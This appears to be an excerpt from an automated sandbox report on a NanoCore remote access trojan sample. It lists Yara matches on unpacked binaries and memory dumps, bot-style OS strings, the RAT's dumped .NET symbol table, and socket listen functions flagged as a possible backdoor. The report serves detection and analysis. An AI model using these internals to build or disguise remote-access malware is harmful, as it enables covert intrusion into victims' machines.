Source: Yara match File source: 13.2.RegSvcs.exe.36e48cd.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.mmuiqlcvwo.pif.3be7c18.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.mmuiqlcvwo.pif.3933240.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.3.mmuiqlcvwo.pif.39f7c18.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.mmuiqlcvwo.pif.3be7c18.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 13.2.RegSvcs.exe.2d0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RegSvcs.exe.34b48cd.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.666071975.0000000000342000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.491934480.0000000004162000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.491184816.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.491143787.0000000003A6B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.490064589.0000000003901000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.521731464.0000000003C31000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.520532031.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.521599703.0000000003C5B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.490024327.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.667048040.0000000003900000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.522232406.0000000003BB5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.667083533.0000000003AF0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.667252127.00000000034A9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.522514317.0000000003BE7000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.535887495.00000000002D2000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.520588500.0000000003AF1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.492022821.0000000003992000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.521632890.0000000003C1B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.522352198.0000000004232000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.491708998.00000000039C5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.536291326.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.666422820.0000000000AE0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.491322689.0000000003A2B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: mmuiqlcvwo.pif PID: 2516, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 2780, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: mmuiqlcvwo.pif PID: 2568, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegSvcs.exe PID: 684, type: MEMORYSTR
OS version to string mapping found (often used in BOTs)
Source: mmuiqlcvwo.pif Binary or memory string: WIN_XP
Source: mmuiqlcvwo.pif Binary or memory string: WIN_XPe
Source: mmuiqlcvwo.pif Binary or memory string: WIN_VISTA
Source: mmuiqlcvwo.pif.4.dr Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPWIN_2000InstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 8, 1USERPROFILEUSERDOMAINUSERDNSDOMAINDefaultGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte!
Source: mmuiqlcvwo.pif Binary or memory string: WIN_7
Source: mmuiqlcvwo.pif Binary or memory string: WIN_8

Remote Access Functionality:

Detected Nanocore Rat
Source: mmuiqlcvwo.pif, 00000005.00000003.492083819.00000000039F7000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 00000006.00000002.666350184.0000000000A30000.00000004.00020000.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Source: mmuiqlcvwo.pif, 0000000C.00000003.522442695.0000000003B82000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp String found in binary or memory: NanoCore.ClientPluginHost
Source: RegSvcs.exe, 0000000D.00000002.536331562.0000000003699000.00000004.00000001.sdmp String found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
Yara detected Nanocore RAT
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_0101C06C OleInitialize,_wcslen,CreateBindCtx,MkParseDisplayName,CLSIDFromProgID,GetActiveObject, 5_2_0101C06C
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_010265D3 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 5_2_010265D3
Source: C:\Users\user\33920049\mmuiqlcvwo.pif Code function: 5_2_01014EFB socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 5_2_01014EFB